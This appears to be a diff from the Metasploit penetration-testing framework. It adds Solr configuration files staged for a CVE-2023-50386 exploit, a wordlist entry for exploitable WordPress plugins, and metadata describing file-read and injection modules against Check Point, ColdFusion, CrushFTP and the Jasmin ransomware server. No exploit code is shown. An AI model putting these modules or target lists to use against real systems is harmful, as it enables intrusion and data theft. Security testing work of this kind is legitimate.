+    </fieldType>
+    <dynamicField name="*_phon_en" type="phonetic_en"  indexed="true"  stored="true"/>
+    <fieldType name="phonetic_en" stored="false" indexed="true" class="solr.TextField" >
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="doubleMetaphone" inject="false"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_s_lower" type="lowercase"  indexed="true"  stored="true"/>
+    <fieldType name="lowercase" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="keyword"/>
+        <filter name="lowercase" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_descendent_path" type="descendent_path"  indexed="true"  stored="true"/>
+    <fieldType name="descendent_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="keyword" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_ancestor_path" type="ancestor_path"  indexed="true"  stored="true"/>
+    <fieldType name="ancestor_path" class="solr.TextField">
+      <analyzer type="index">
+        <tokenizer name="keyword" />
+      </analyzer>
+      <analyzer type="query">
+        <tokenizer name="pathHierarchy" delimiter="/" />
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_point" type="point"  indexed="true"  stored="true"/>
+    <fieldType name="point" class="solr.PointType" dimension="2" subFieldSuffix="_d"/>
+    <fieldType name="location" class="solr.LatLonPointSpatialField" docValues="true"/>
+    <fieldType name="location_rpt" class="solr.SpatialRecursivePrefixTreeFieldType"
+               geo="true" distErrPct="0.025" maxDistErr="0.001" distanceUnits="kilometers" />
+    <fieldType name="delimited_payloads_float" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="float"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_int" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="integer"/>
+      </analyzer>
+    </fieldType>
+    <fieldType name="delimited_payloads_string" stored="false" indexed="true" class="solr.TextField">
+      <analyzer>
+        <tokenizer name="whitespace"/>
+        <filter name="delimitedPayload" encoder="identity"/>
+      </analyzer>
+    </fieldType>
+    <dynamicField name="*_txt_cjk" type="text_cjk"  indexed="true"  stored="true"/>
+    <fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
+      <analyzer>
+        <tokenizer name="standard"/>
+        <filter name="CJKWidth"/>
+        <filter name="lowercase"/>
+        <filter name="CJKBigram"/>
+      </analyzer>
+    </fieldType>
+</schema>

data/exploits/CVE-2023-50386/solrconfig.xml

@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" ?>
+<config>
+  <luceneMatchVersion>9.0</luceneMatchVersion>
+  <dataDir>${solr.data.dir:}</dataDir>
+  <directoryFactory name="DirectoryFactory"
+                    class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
+  <codecFactory class="solr.SchemaCodecFactory"/>
+  <indexConfig>
+    <lockType>${solr.lock.type:native}</lockType>
+  </indexConfig>
+  <updateHandler class="solr.DirectUpdateHandler2">
+
+    <updateLog>
+      <str name="dir">${solr.ulog.dir:}</str>
+      <int name="numVersionBuckets">${solr.ulog.numVersionBuckets:65536}</int>
+    </updateLog>
+
+    <autoCommit>
+      <maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
+      <openSearcher>false</openSearcher>
+    </autoCommit>
+
+    <autoSoftCommit>
+      <maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
+    </autoSoftCommit>
+
+  </updateHandler>
+
+  <query>
+
+    <maxBooleanClauses>${solr.max.booleanClauses:1024}</maxBooleanClauses>
+
+    <filterCache size="512"
+                 initialSize="512"
+                 autowarmCount="0"/>
+    <queryResultCache size="512"
+                      initialSize="512"
+                      autowarmCount="0"/>
+
+    <documentCache size="512"
+                   initialSize="512"
+                   autowarmCount="0"/>
+
+    <cache name="perSegFilter"
+           class="solr.CaffeineCache"
+           size="10"
+           initialSize="0"
+           autowarmCount="10"
+           regenerator="solr.NoOpRegenerator" />
+
+    <enableLazyFieldLoading>true</enableLazyFieldLoading>
+
+    <queryResultWindowSize>20</queryResultWindowSize>
+
+    <queryResultMaxDocsCached>200</queryResultMaxDocsCached>
+
+    <listener event="newSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+    <listener event="firstSearcher" class="solr.QuerySenderListener">
+      <arr name="queries">
+      </arr>
+    </listener>
+
+    <useColdSearcher>false</useColdSearcher>
+
+  </query>
+
+    <circuitBreakers enabled="true">
+
+  </circuitBreakers>
+
+  <requestDispatcher>
+
+    <httpCaching never304="true" />
+  </requestDispatcher>
+
+  <requestHandler name="/select" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <int name="rows">10</int>
+    </lst>
+  </requestHandler>
+  <requestHandler name="/query" class="solr.SearchHandler">
+    <lst name="defaults">
+      <str name="echoParams">explicit</str>
+      <str name="wt">json</str>
+      <str name="indent">true</str>
+    </lst>
+  </requestHandler>
+  <initParams path="/update/**,/query,/select,/spell">
+    <lst name="defaults">
+      <str name="df">_text_</str>
+    </lst>
+  </initParams>
+  <searchComponent name="spellcheck" class="solr.SpellCheckComponent">
+    <str name="queryAnalyzerFieldType">text_general</str>
+    <lst name="spellchecker">
+      <str name="name">default</str>
+      <str name="field">_text_</str>
+      <str name="classname">solr.DirectSolrSpellChecker</str>
+      <str name="distanceMeasure">internal</str>
+      <float name="accuracy">0.5</float>
+      <int name="maxEdits">2</int>
+      <int name="minPrefix">1</int>
+      <int name="maxInspections">5</int>
+      <int name="minQueryLength">4</int>
+      <float name="maxQueryFrequency">0.01</float>
+    </lst>
+  </searchComponent>
+  <requestHandler name="/spell" class="solr.SearchHandler" startup="lazy">
+    <lst name="defaults">
+      <str name="spellcheck.dictionary">default</str>
+      <str name="spellcheck">on</str>
+      <str name="spellcheck.extendedResults">true</str>
+      <str name="spellcheck.count">10</str>
+      <str name="spellcheck.alternativeTermCount">5</str>
+      <str name="spellcheck.maxResultsForSuggest">5</str>
+      <str name="spellcheck.collate">true</str>
+      <str name="spellcheck.collateExtendedResults">true</str>
+      <str name="spellcheck.maxCollationTries">10</str>
+      <str name="spellcheck.maxCollations">5</str>
+    </lst>
+    <arr name="last-components">
+      <str>spellcheck</str>
+    </arr>
+  </requestHandler>
+  <searchComponent class="solr.HighlightComponent" name="highlight">
+    <highlighting>
+      <fragmenter name="gap"
+                  default="true"
+                  class="solr.highlight.GapFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">100</int>
+        </lst>
+      </fragmenter>
+
+      <fragmenter name="regex"
+                  class="solr.highlight.RegexFragmenter">
+        <lst name="defaults">
+          <int name="hl.fragsize">70</int>
+          <float name="hl.regex.slop">0.5</float>
+          <str name="hl.regex.pattern">[-\w ,/\n\&quot;&apos;]{20,200}</str>
+        </lst>
+      </fragmenter>
+      <formatter name="html"
+                 default="true"
+                 class="solr.highlight.HtmlFormatter">
+        <lst name="defaults">
+          <str name="hl.simple.pre"><![CDATA[<em>]]></str>
+          <str name="hl.simple.post"><![CDATA[</em>]]></str>
+        </lst>
+      </formatter>
+      <encoder name="html"
+               class="solr.highlight.HtmlEncoder" />
+
+      <fragListBuilder name="simple"
+                       class="solr.highlight.SimpleFragListBuilder"/>
+
+      <fragListBuilder name="single"
+                       class="solr.highlight.SingleFragListBuilder"/>
+
+      <fragListBuilder name="weighted"
+                       default="true"
+                       class="solr.highlight.WeightedFragListBuilder"/>
+
+      <fragmentsBuilder name="default"
+                        default="true"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+      </fragmentsBuilder>
+
+      <fragmentsBuilder name="colored"
+                        class="solr.highlight.ScoreOrderFragmentsBuilder">
+        <lst name="defaults">
+          <str name="hl.tag.pre"><![CDATA[
+               <b style="background:yellow">,<b style="background:lawgreen">,
+               <b style="background:aquamarine">,<b style="background:magenta">,
+               <b style="background:palegreen">,<b style="background:coral">,
+               <b style="background:wheat">,<b style="background:khaki">,
+               <b style="background:lime">,<b style="background:deepskyblue">]]></str>
+          <str name="hl.tag.post"><![CDATA[</b>]]></str>
+        </lst>
+      </fragmentsBuilder>
+
+      <boundaryScanner name="default"
+                       default="true"
+                       class="solr.highlight.SimpleBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.maxScan">10</str>
+          <str name="hl.bs.chars">.,!? &#9;&#10;&#13;</str>
+        </lst>
+      </boundaryScanner>
+
+      <boundaryScanner name="breakIterator"
+                       class="solr.highlight.BreakIteratorBoundaryScanner">
+        <lst name="defaults">
+          <str name="hl.bs.type">WORD</str>
+          <str name="hl.bs.language">en</str>
+          <str name="hl.bs.country">US</str>
+        </lst>
+      </boundaryScanner>
+    </highlighting>
+  </searchComponent>
+
+  <updateProcessor class="solr.UUIDUpdateProcessorFactory" name="uuid"/>
+  <updateProcessor class="solr.RemoveBlankFieldUpdateProcessorFactory" name="remove-blank"/>
+  <updateProcessor class="solr.FieldNameMutatingUpdateProcessorFactory" name="field-name-mutating">
+    <str name="pattern">[^\w-\.]</str>
+    <str name="replacement">_</str>
+  </updateProcessor>
+  <updateProcessor class="solr.ParseBooleanFieldUpdateProcessorFactory" name="parse-boolean"/>
+  <updateProcessor class="solr.ParseLongFieldUpdateProcessorFactory" name="parse-long"/>
+  <updateProcessor class="solr.ParseDoubleFieldUpdateProcessorFactory" name="parse-double"/>
+  <updateProcessor class="solr.ParseDateFieldUpdateProcessorFactory" name="parse-date">
+    <arr name="format">
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd['T'[HH:mm[:ss[,SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[.SSS]][z</str>
+      <str>yyyy-MM-dd HH:mm[:ss[,SSS]][z</str>
+      <str>[EEE, ]dd MMM yyyy HH:mm[:ss] z</str>
+      <str>EEEE, dd-MMM-yy HH:mm:ss z</str>
+      <str>EEE MMM ppd HH:mm:ss [z ]yyyy</str>
+    </arr>
+  </updateProcessor>
+  <updateProcessor class="solr.AddSchemaFieldsUpdateProcessorFactory" name="add-schema-fields">
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.String</str>
+      <str name="fieldType">text_general</str>
+      <lst name="copyField">
+        <str name="dest">*_str</str>
+        <int name="maxChars">256</int>
+      </lst>
+      <bool name="default">true</bool>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Boolean</str>
+      <str name="fieldType">booleans</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.util.Date</str>
+      <str name="fieldType">pdates</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Long</str>
+      <str name="valueClass">java.lang.Integer</str>
+      <str name="fieldType">plongs</str>
+    </lst>
+    <lst name="typeMapping">
+      <str name="valueClass">java.lang.Number</str>
+      <str name="fieldType">pdoubles</str>
+    </lst>
+  </updateProcessor>
+
+  <updateRequestProcessorChain name="add-unknown-fields-to-the-schema" default="${update.autoCreateFields:true}"
+           processor="uuid,remove-blank,field-name-mutating,parse-boolean,parse-long,parse-double,parse-date,add-schema-fields">
+    <processor class="solr.LogUpdateProcessorFactory"/>
+    <processor class="solr.DistributedUpdateProcessorFactory"/>
+    <processor class="solr.RunUpdateProcessorFactory"/>
+  </updateRequestProcessorChain>
+
+</config>

data/markdown_doc/default_template.erb

@@ -83,6 +83,8 @@
 <% description = "The module is expected to get a shell every time it runs." %>
 <% elsif reliability == "unreliable-session" %>
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
+<% elsif reliability == "event-dependent" %>
+<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
 <% end %>
 
 * **<%= reliability %>:** <%= description %>

data/wordlists/wp-exploitable-plugins.txt

@@ -61,3 +61,4 @@ woocommerce-payments
 file-manager-advanced-shortcode
 royal-elementor-addons
 backup-backup
+hash-form

data/wordlists/wp-plugins.txt

@@ -34566,6 +34566,7 @@ hash-comment-ip
 hash-converter
 hash-coupon
 hash-elements
+hash-form
 hash-hash-tags
 hash-link-scroll-offset
 hashbar-wp-notification-bar

db/modules_metadata_base.json

@@ -771,7 +771,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2023-03-13 10:31:27 +0000",
+    "mod_time": "2024-04-26 12:33:43 +0000",
     "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
     "is_install_path": true,
     "ref_name": "admin/dcerpc/cve_2022_26923_certifried",
@@ -903,7 +903,7 @@
       "microsoft-ds"
     ],
     "targets": null,
-    "mod_time": "2024-03-01 12:00:34 +0000",
+    "mod_time": "2024-04-16 16:43:30 +0000",
     "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
     "is_install_path": true,
     "ref_name": "admin/dcerpc/samr_computer",
@@ -6416,7 +6416,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-03-07 13:28:22 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb",
     "is_install_path": true,
     "ref_name": "admin/ldap/ad_cs_cert_template",
@@ -6438,7 +6438,9 @@
         "Certipy"
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -6489,7 +6491,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
     "is_install_path": true,
     "ref_name": "admin/ldap/rbcd",
@@ -6507,7 +6509,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -6556,7 +6560,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-04-09 07:53:26 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb",
     "is_install_path": true,
     "ref_name": "admin/ldap/shadow_credentials",
@@ -6574,7 +6578,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -6627,12 +6633,12 @@
 
     ],
     "targets": null,
-    "mod_time": "2023-10-12 19:08:51 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
     "check": true,
-    "post_auth": false,
+    "post_auth": true,
     "default_credential": false,
     "notes": {
       "Stability": [
@@ -6646,7 +6652,9 @@
 
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -6903,7 +6911,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_enum",
@@ -7104,7 +7112,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_escalate_dbowner",
@@ -7205,7 +7213,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-14 15:26:34 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_escalate_execute_as",
@@ -7308,7 +7316,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_exec",
@@ -7364,7 +7372,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:57:53 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_findandsampledata",
@@ -7415,7 +7423,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_idf",
@@ -7567,7 +7575,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-03-27 09:54:38 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_sql",
@@ -7618,7 +7626,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2024-02-19 10:34:16 +0000",
+    "mod_time": "2024-03-05 13:27:00 +0000",
     "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb",
     "is_install_path": true,
     "ref_name": "admin/mssql/mssql_sql_file",
@@ -9198,6 +9206,67 @@
 
     ]
   },
+  "auxiliary_admin/registry_security_descriptor": {
+    "name": "Windows Registry Security Descriptor Utility",
+    "fullname": "auxiliary/admin/registry_security_descriptor",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Christophe De La Fuente"
+    ],
+    "description": "Read or write a Windows registry security descriptor remotely.\n\n          In READ mode, the `FILE` option can be set to specify where the\n          security descriptor should be written to.\n\n          The following format is used:\n          ```\n          key: <registry key>\n          security_info: <security information>\n          sd: <security descriptor as a hex string>\n          ```\n\n          In WRITE mode, the `FILE` option can be used to specify the information\n          needed to write the security descriptor to the remote registry. The file must\n          follow the same format as described above.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-13 12:01:54 +0000",
+    "path": "/modules/auxiliary/admin/registry_security_descriptor.rb",
+    "is_install_path": true,
+    "ref_name": "admin/registry_security_descriptor",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "smb"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "READ",
+        "description": "Read a Windows registry security descriptor"
+      },
+      {
+        "name": "WRITE",
+        "description": "Write a Windows registry security descriptor"
+      }
+    ]
+  },
   "auxiliary_admin/sap/cve_2020_6207_solman_rce": {
     "name": "SAP Solution Manager remote unauthorized OS commands execution",
     "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce",
@@ -12407,7 +12476,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2024-02-22 14:18:29 +0000",
+    "mod_time": "2024-06-03 11:02:15 +0000",
     "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
     "is_install_path": true,
     "ref_name": "cloud/aws/enum_ssm",
@@ -12554,7 +12623,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2024-05-23 12:23:27 +0000",
     "path": "/modules/auxiliary/crawler/msfcrawler.rb",
     "is_install_path": true,
     "ref_name": "crawler/msfcrawler",
@@ -19776,7 +19845,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2023-12-01 08:03:32 +0000",
+    "mod_time": "2024-05-02 13:57:13 +0000",
     "path": "/modules/auxiliary/gather/asrep.rb",
     "is_install_path": true,
     "ref_name": "gather/asrep",
@@ -19798,7 +19867,9 @@
         "asreproast"
       ]
     },
-    "session_types": false,
+    "session_types": [
+      "ldap"
+    ],
     "needs_cleanup": false,
     "actions": [
       {
@@ -20212,6 +20283,67 @@
 
     ]
   },
+  "auxiliary_gather/checkpoint_gateway_fileread_cve_2024_24919": {
+    "name": "Check Point Security Gateway Arbitrary File Read",
+    "fullname": "auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "remmons-r7"
+    ],
+    "description": "This module leverages an unauthenticated arbitrary root file read vulnerability for\n          Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades\n          are enabled on affected devices, traversal payloads can be used to read any files on\n          the local file system. Password hashes read from disk may be cracked, potentially\n          resulting in administrator-level access to the target device. This vulnerability is\n          tracked as CVE-2024-24919.",
+    "references": [
+      "URL-https://support.checkpoint.com/results/sk/sk182336",
+      "URL-https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/",
+      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-06-13 08:14:35 +0000",
+    "path": "/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb",
+    "is_install_path": true,
+    "ref_name": "gather/checkpoint_gateway_fileread_cve_2024_24919",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/checkpoint_hostname": {
     "name": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
     "fullname": "auxiliary/gather/checkpoint_hostname",
@@ -20616,6 +20748,70 @@
       }
     ]
   },
+  "auxiliary_gather/coldfusion_pms_servlet_file_read": {
+    "name": "CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read",
+    "fullname": "auxiliary/gather/coldfusion_pms_servlet_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-03-12",
+    "type": "auxiliary",
+    "author": [
+      "ma4ter",
+      "yoryio",
+      "Christiaan Beek",
+      "jheysel-r7"
+    ],
+    "description": "This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version\n          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication\n          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that\n          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.",
+    "references": [
+      "CVE-2024-20767",
+      "URL-https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html",
+      "URL-https://jeva.cc/2973.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8500,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-02 09:47:22 +0000",
+    "path": "/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/coldfusion_pms_servlet_file_read",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/coldfusion_pwd_props": {
     "name": "ColdFusion 'password.properties' Hash Extraction",
     "fullname": "auxiliary/gather/coldfusion_pwd_props",
@@ -20770,6 +20966,66 @@
 
     ]
   },
+  "auxiliary_gather/crushftp_fileread_cve_2024_4040": {
+    "name": "CrushFTP Unauthenticated Arbitrary File Read",
+    "fullname": "auxiliary/gather/crushftp_fileread_cve_2024_4040",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "remmons-r7"
+    ],
+    "description": "This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and\n          < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without\n          authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The\n          primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote\n          code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).",
+    "references": [
+      "CVE-2024-4040",
+      "URL-https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-03 12:01:48 +0000",
+    "path": "/modules/auxiliary/gather/crushftp_fileread_cve_2024_4040.rb",
+    "is_install_path": true,
+    "ref_name": "gather/crushftp_fileread_cve_2024_4040",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/cve_2021_27850_apache_tapestry_hmac_key": {
     "name": "Apache Tapestry HMAC secret key leak",
     "fullname": "auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key",
@@ -22591,6 +22847,129 @@
 
     ]
   },
+  "auxiliary_gather/jasmin_ransomware_dir_traversal": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated Directory Traversal",
+    "fullname": "auxiliary/gather/jasmin_ransomware_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability\n          within the download functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.",
+    "references": [
+      "CVE-2024-30851",
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_dir_traversal",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
+  "auxiliary_gather/jasmin_ransomware_sqli": {
+    "name": "Jasmin Ransomware Web Server Unauthenticated SQL Injection",
+    "fullname": "auxiliary/gather/jasmin_ransomware_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-08",
+    "type": "auxiliary",
+    "author": [
+      "chebuya",
+      "h00die"
+    ],
+    "description": "The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability\n          within the login functionality. As of April 15, 2024 this was still unpatched, so all\n          versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.\n\n          Retrieving the victim's data may take a long amount of time. It is much quicker to\n          get the logins, then just login to the site.",
+    "references": [
+      "URL-https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+      "URL-https://github.com/codesiddhant/Jasmin-Ransomware"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2024-05-04 16:06:48 +0000",
+    "path": "/modules/auxiliary/gather/jasmin_ransomware_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/jasmin_ransomware_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
   "auxiliary_gather/java_rmi_registry": {
     "name": "Java RMI Registry Interfaces Enumeration",
     "fullname": "auxiliary/gather/java_rmi_registry",
